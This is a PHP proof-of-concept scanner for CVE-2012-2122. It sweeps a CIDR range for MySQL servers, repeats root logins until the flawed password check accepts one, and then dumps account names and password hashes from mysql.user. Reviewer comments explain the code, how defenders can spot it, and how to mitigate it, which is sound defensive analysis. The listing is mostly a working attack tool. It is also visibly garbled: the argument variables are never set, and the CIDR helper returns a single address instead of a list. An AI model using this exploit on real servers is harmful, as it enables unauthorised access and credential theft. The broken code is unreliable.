Usage
php scanner.php 10.0.0.1/18 block in cidr notation
Requirements:
php5-cli
POC
<?php
/*
l0l get at me ;) - Avinza
CVE-2012-2122 scanner
*/
/*
Reviewer notes (code below is left exactly as listed; only comments were added).

What the listing does: it takes one CIDR argument, expands it with cidr_gen(),
and for each address that accepts a TCP connection on port 3306 it calls
mysql_connect() as 'root' with one random string, up to 512 times. Whenever a
call returns a link it runs the query held in $sql and var_dump()s every row.

Defender view: on a server this appears as a burst of several hundred root
logins from a single client within seconds, nearly all of them failures (where
failed logins are logged). A success inside such a burst means the account
table was read, so every hash in mysql.user should be treated as exposed and
the passwords rotated. Mitigations: run a vendor build that fixes
CVE-2012-2122, keep 3306 unreachable from untrusted networks, and do not allow
remote root logins.
*/
// Turns off all PHP error reporting for the run.
error_reporting(0);
// NOTE(review): $argv0 and $argv1 are never assigned anywhere in this listing
// (the text looks garbled by extraction). As shown, isset($argv1) is false, so
// the guard below always fires: usage is printed and nothing further runs.
$me = @$argv0;
// The second test relies on strpos() truthiness, so a "/" at offset 0 is also rejected.
if(!isset($argv1) || !strpos($argv1,"/")) {
printf("php %s %s \n", "{$me}","10.0.0.1/18 block in cidr notation");
/* clean this shit up */
exit;
}
// Split "address/prefix" into its two parts; neither part is validated here.
list($start,$mask) = explode("/",$argv1);
$block=cidr_gen($start,$mask,TRUE);
//echo print_r($block,1)."\n";
foreach ($block as $host) {
// Reachability test only, with a 30-second timeout; the handle in $open is
// never written to, read from or closed in this listing.
$open = fsockopen($host, 3306, $errno, $errstr, 30); /* because im lame */
// One random string per host, created outside the do-loop, so every attempt
// against that host reuses the same value. It is not meant to be the right
// password: CVE-2012-2122 is a flaw in the server's password check that
// occasionally accepts a wrong one, which is why the guess is simply repeated.
$p = uniqid(mt_rand());
$i = 0;
if($open){
// %d formats $host as an integer, so a dotted-quad string is not printed in full.
printf("#%d accepts connections.\n", $host);
do {
// mysql_* is the legacy ext/mysql API (removed in PHP 7); "@" hides the
// warning each rejected login would otherwise raise on the client side.
$link = @mysql_connect($host, 'root', $p);
if($link) {
printf("Host %s is vulnerable. Proceeding With Dump\n", $host);
// Reads account names and password hashes from the server's grant table.
$sql = "SELECT user,password from mysql.user";
/* dump hashes (replace with whatever query */
// Changes the default schema; the query above is fully qualified, so it does
// not depend on this call.
mysql_select_db('information_schema');
$results = mysql_query($sql);
if($results) {
printf(" %s ","\n");
while($row = mysql_fetch_assoc($results)) {
var_dump($row);
printf(" %s ","\n");
}
} else {
printf(" %s ", "Host Appears to Be Vuln But Query Failed: {$sql}: " . mysql_error());
}
}
//printf("#%d Attempts.\n", $i);
$i++;
// There is no break after a successful login: all 512 attempts are always
// made, and the dump repeats for every attempt that is accepted.
} while($i < 512);
}
}
/**
 * Work out the address range of an IPv4 CIDR block.
 *
 * No validation is visible here: $ip goes straight to ip2long() and $bitmask
 * straight into the 32-$bitmask arithmetic.
 *
 * @param string     $ip           Dotted-quad address inside the block.
 * @param int|string $bitmask      Prefix length; defaults to 24.
 * @param bool       $return_array FALSE: return the summary array built below.
 *                                 TRUE: run the enumeration loop and return $ips.
 * @return array|string Summary array with keys first, size, last, first_ip and
 *                      last_ip, or the value left in $ips by the loop (see the
 *                      note inside it).
 */
function cidr_gen($ip,$bitmask=24,$return_array=FALSE) {
// Network mask as a number: all 32 bits set, minus the host-bit part.
$corr=(pow(2,32)-1)-(pow(2,32-$bitmask)-1);
// Clear the host bits to get the first address of the block.
$first=ip2long($ip) & ($corr);
// Offset of the last address from the first (block size minus one).
$length=pow(2,32-$bitmask)-1;
if (!$return_array) {
return array(
'first'=>$first,
'size'=>$length+1,
'last'=>$first+$length,
'first_ip'=>long2ip($first),
'last_ip'=>long2ip($first+$length)
);
}
$ips=array();
for ($i=0;$i<=$length;$i++) {
// NOTE(review): this is a plain assignment, so as listed $ips is replaced by a
// string on every pass, and the function returns only the last address of the
// block rather than the array initialised above. The listing may be garbled
// here; it is left as found.
$ips=long2ip($first+$i);
}
return $ips;
}
?>
